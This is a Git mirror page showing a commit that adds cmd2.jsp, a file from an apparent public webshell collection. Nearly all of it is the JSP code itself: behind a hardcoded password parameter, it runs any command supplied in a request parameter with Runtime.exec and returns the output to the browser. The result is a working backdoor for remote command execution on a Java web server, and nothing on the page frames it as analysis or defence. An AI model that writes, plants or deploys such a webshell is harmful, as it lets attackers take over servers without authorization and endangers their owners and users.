mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
12
jsp/cat/cmd2.jsp
Normal file
12
jsp/cat/cmd2.jsp
Normal file
@@ -0,0 +1,12 @@
|
|||||||
|
<%
|
||||||
|
if("023".equals(request.getParameter("pwd"))){
|
||||||
|
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
|
||||||
|
int a = -1;
|
||||||
|
byte[] b = new byte[2048];
|
||||||
|
out.print("<pre>");
|
||||||
|
while((a=in.read(b))!=-1){
|
||||||
|
out.println(new String(b));
|
||||||
|
}
|
||||||
|
out.print("</pre>");
|
||||||
|
}
|
||||||
|
%>
|
||||||
Reference in New Issue
Block a user